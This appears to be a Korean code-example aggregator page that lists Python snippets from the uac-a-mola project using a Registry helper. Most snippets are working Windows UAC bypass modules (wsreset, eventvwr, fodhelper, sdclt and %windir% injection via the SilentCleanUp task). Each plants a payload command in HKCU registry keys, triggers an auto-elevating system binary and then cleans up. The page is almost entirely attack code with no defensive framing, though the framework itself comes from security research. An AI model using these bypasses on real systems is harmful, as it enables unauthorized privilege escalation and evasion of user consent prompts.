Python Registry 예제들

예제 #1

파일: fileless_wsreset.py 프로젝트: yuhisern7/uac-a-mola

class CustomModule(Module):
    def __init__(self):
        information = {"Name": "Fileless Wsreset",
                       "Description": "Fileless - Wsreset bypass UAC ",
                       "Author": "Josue Encinar"}

        # -----------name-----default_value--description
        options = {"instruction": ["C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -C echo mola > c:\pwned.txt", "Elevated Code", True]
                   }

        # Constructor of the parent class
        super(CustomModule, self).__init__(information, options)

        # Class atributes, initialization in the run_module method
        # after the user has set the values
        self.reg = Registry()

    # This module must be always implemented, it is called by the run option
    def run_module(self):
        path = "Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
        print("Creating hive...")
        k = self.reg.create_key(HKCU, path)
        print("Created hive")
        print("Setting 'Default'...")
        self.reg.set_value(HKCU, path, self.args["instruction"])
        print("Done!")
        print("Executing... wsreset.exe")
        self.run_binary("C:\\Windows\\System32\\wsreset.exe")
        print("Got it? :D")
        print("Now... Deleting hive!")
        self.reg.restore(k)
        print("Deleted!")

예제 #2

파일: fileless_eventvwr.py 프로젝트: yuhisern7/uac-a-mola

class CustomModule(Module):
    def __init__(self):
        information = {"Name": "Fileless Eventvwr",
                       "Description": "Fileless - Eventvwr bypass UAC ",
                       "Author": "Pablo Gonzalez"}

        # -----------name-----default_value--description
        options = {"instruction": ["C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -C echo mola > c:\pwned.txt", "Elevated Code", True]
                   }

        # Constructor of the parent class
        super(CustomModule, self).__init__(information, options)

        # Class atributes, initialization in the run_module method
        # after the user has set the values
        self.reg = Registry()

    # This module must be always implemented, it is called by the run option
    def run_module(self):
        print "Creating hive..."
        k = self.reg.create_key(HKCU,"Software\\Classes\\mscfile\\shell\\open\\command")
        print "Created hive"
        print "Setting 'Default'..."
        self.reg.set_value(HKCU,"Software\\Classes\\mscfile\\shell\\open\\command", self.args["instruction"])
        print "Done!"
        print "Executing... eventvwr.exe"
        self.run_binary("C:\\Windows\\System32\\eventvwr.exe")
        print "Got it? :D"
        print "Now... Deleting hive!"
        self.reg.restore(k)
        print "Deleted!"

			

예제 #3

    def __init__(self):
        information = {"Name": "Fileless Fodhelper",
                       "Description": "Fileless - Fodhelper bypass UAC ",
                       "Author": "Santiago Hernández Ramos"}

        # -----------name-----default_value--description
        options = {"instruction": ["C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -C echo mola > c:\pwned.txt", "Elevated Code", True]
                   }

        # Constructor of the parent class
        super(CustomModule, self).__init__(information, options)

        # Class atributes, initialization in the run_module method
        # after the user has set the values
        self.reg = Registry()

예제 #4

    def run_module(self):
        r = Registry()
        k = r.create_key(HKCU, self.args["registry_path"])
        if self.args["key_value"] is not None:
            r.set_value(HKCU, self.args["registry_path"],
                        self.args["key_value"])
        if self.args["value_Name"] is not None:
            r.create_value(k, self.args["value_Name"],
                           self.args["value_Value"])

        print "[*] Executing binary and restoring"

예제 #5

파일: fileless_sdclt.py 프로젝트: yuhisern7/uac-a-mola

 def run_module(self):
     # To access user provided attributes, use self._args dictionary
     payload = self.args["payload"]
     reg = Registry()        
     print "Creating hive..."
     key = reg.create_key(HKCU,"Software\\Classes\\exefile\\shell\\runas\\command")
     print "Hive created"
     print "Creating value IsolatedCommand..."
     reg.create_value(key,"IsolatedCommand", payload)
     print "Value created"
     print "Executing... sdclt.exe"
     self.run_binary("C:\\Windows\\System32\\sdclt.exe", ["/KickOffElev"])
     print "Got it? :D"
     reg.delete_key(HKCU,"Software\\Classes\\exefile\\shell\\runas\\command")
     print "Registry state restored"

예제 #6

파일: variable_injection.py 프로젝트: yuhisern7/uac-a-mola

 def run_module(self):
     reg = Registry()
     print "Opening hive..."
     k = reg.create_key(HKCU, "Environment")
     print "Opened hive"
     print "Creating %windir% value"
     reg.create_value(k, "windir", self.args["payload"])
     print "Done!"
     print "Executing... SilentCleanUp Task"
     self.run_binary(
         "schtasks /RUN /TN \Microsoft\windows\DiskCleanUp\SilentCleanUp /I"
     )
     print "Got it? :D"
     print "Restoring the registry state..."
     reg.del_value(k, "windir")
     print "Restored!"

예제 #7

파일: fileless_discovery.py 프로젝트: yuhisern7/uac-a-mola

 def init_import_modules(self):
     parser = ProcmonXmlParser(self.args["xml_file"])
     self.p = parser.parse()
     self.reg = Registry()